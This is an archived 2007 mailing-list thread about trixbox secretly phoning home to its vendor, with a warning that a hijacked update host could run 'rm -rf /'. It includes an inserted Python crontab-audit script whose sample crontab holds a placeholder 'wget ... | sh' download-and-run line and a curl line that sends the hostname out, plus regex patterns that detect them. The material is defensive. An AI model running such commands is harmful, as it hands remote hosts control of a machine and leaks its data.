I just read on Slashdot (at http://yro.slashdot.org/article.pl?sid=07/12/16/222243 ) that Trixbox "has been phoning home with statistics about their installations", as a Trixbox user exposed in "Trixbox Phones Home" at http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home . -- (C) Matthew Rubenstein
As I pointed out here last night, there is also a very serious security vulnerability associated with this. Example: An attacker could compromise the script that is used on the remote host, and set it to force clients that connect to run a command such as "rm -rf /". There are about half a dozen ways I could see this being abused - in either a "one off" or an "every installation" scenario. Fonality has yet to acknowledge this aspect of the issue - and I fear that they never will. See: http://voipsa.org/pipermail/voipsec_voipsa.org/2007-December/002522.html

P.S.: On behalf of Rob (of FreePBX fame), I'd like to also point out that this is something that was added to trixbox, and not FreePBX. Quoting Rob: "when someone mistakenly says 'trixbox does...' they usually mean 'freepbx does...' as FreePBX is the GUI Trixbox uses to configure Asterisk". In this instance, that is not the case - it is only a trixbox issue.

> From: email at mattruby.com
> To: asterisk-users at lists.digium.com; asterisk-biz at lists.digium.com
> Date: Sun, 16 Dec 2007 20:53:53 -0500
> Subject: [asterisk-users] Trixbox Phones Home
>
> I just read on Slashdot (at
> http://yro.slashdot.org/article.pl?sid=07/12/16/222243 ) that Trixbox
> "has been phoning home with statistics about their installations", as a
> Trixbox user exposed in "Trixbox Phones Home" at
> http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home .
> --
>
> (C) Matthew Rubenstein
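The risk raised in the message above is a scheduled check that pulls content from a vendor host and hands it to a shell, so whoever controls that host controls every installation. An administrator can look for that pattern in their own cron entries. The following audit script is an added example for this thread, not code from trixbox, FreePBX or any poster; the crontab lines, hostnames and paths in it are constructed placeholders.

```python
import re

# Constructed sample crontab (not from any real product). Line 3 feeds a remote
# script straight into sh; line 4 only reports data outbound on a schedule.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/sbin/backup-asterisk.sh
*/30 * * * * wget -q -O - http://updates.example.invalid/check.php | sh
15 4 * * * curl -s http://stats.example.invalid/report.php?id=$(hostname) > /dev/null
0 * * * * /usr/bin/php /var/www/html/admin/update_check.php
"""

# Highest risk: output of a download piped into an interpreter as the cron user.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|python\d?|perl)\b")
# Lower risk but worth review: any scheduled outbound HTTP request (phone-home).
OUTBOUND_HTTP = re.compile(r"\b(curl|wget)\b.*\bhttps?://(?P<host>[^/\s]+)")


def audit_crontab(text):
    """Return (line_no, severity, remote_host, command) for each suspicious entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = line.strip()
        if not cmd or cmd.startswith("#"):
            continue                      # skip blank lines and comments
        m = OUTBOUND_HTTP.search(cmd)
        if not m:
            continue                      # no download tool with a URL on this line
        host = m.group("host")
        if PIPE_TO_SHELL.search(cmd):
            findings.append((n, "critical", host, cmd))  # remote host can run code here
        else:
            findings.append((n, "review", host, cmd))    # data leaves the box on a timer
    return findings


if __name__ == "__main__":
    for line_no, severity, host, cmd in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {severity:8} {host:28} {cmd}")
```

Run it against `crontab -l` output or the files under /etc/cron.d; a "critical" hit means the remote side, or anyone who can tamper with it, chooses what runs on the box.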
Thanks Tzafrir! I really appreciate FreePBX. Keep up the good work.

Best regards,
Mouta

On Dec 18, 2007 11:59 AM, Tzafrir Cohen <tzafrir.cohen at xorcom.com> wrote:
> On Tue, Dec 18, 2007 at 11:38:03AM +0000, Marco Mouta wrote:
> > In
> > http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home
> > Kerry Garrison is quoted as saying that:
> >
> > Both trixbox and FreePBX have phone-home mechanisms in them.
> >
> > So does FreePBX phone home too?
>
> And if you read further down that thread you would have seen the reply
> by philippel of FreePBX:
>
> ...
> | The only time this happens is when an online update is initiated by you,
> | or if you have chosen to receive update notifications since those are
> | nothing more than a cron job that does exactly what "Check for Online
> | Updates" does in the GUI.
> ...
>
> --
> Tzafrir Cohen
> icq#16849755 jabber:tzafrir.cohen at xorcom.com
> +972-50-7952406 mailto:tzafrir.cohen at xorcom.com
> http://www.xorcom.com iax:guest at local.xorcom.com/tzafrir

--
This message (including any attachments) may contain confidential information for the exclusive use of the addressee. If you are not the intended addressee, you must not use, distribute or copy this e-mail. If you received this message in error, please inform the sender and delete it immediately. Thank you.

This e-mail message is intended only for individual(s) to whom it is addressed and may contain information that is privileged, confidential, proprietary, or otherwise exempt from disclosure under applicable law. If you believe you have received this message in error, please advise the sender by return e-mail and delete it from your mailbox. Thank you.
> We expect Kerry Garrison to respond to this live Friday 21st Dec at 12
> Noon EST with what steps they are taking and why.
> http://VoipUsersConference.org
> IRC: #voip-users-conference on Freenode.net

Thanks to all who participated in the call. A lot of interesting side issues came up, such as who should make money on what. It always amazes me the distance between the diametrically opposed viewpoints, but I think we can all agree that we wish the entire asterisk community a great 2008 and a Wonderful, Frank Capra-esque life.

The mp3 recordings of all calls are available in a list here: http://food4wine.ning.com/conference

Happy, Prosperous and meaningful New Year to all!

Next week, VOIP 2007 in review.

January Conference Highlights:
Jan 4th, Mark Spencer
mid-January: Junction Networks

randy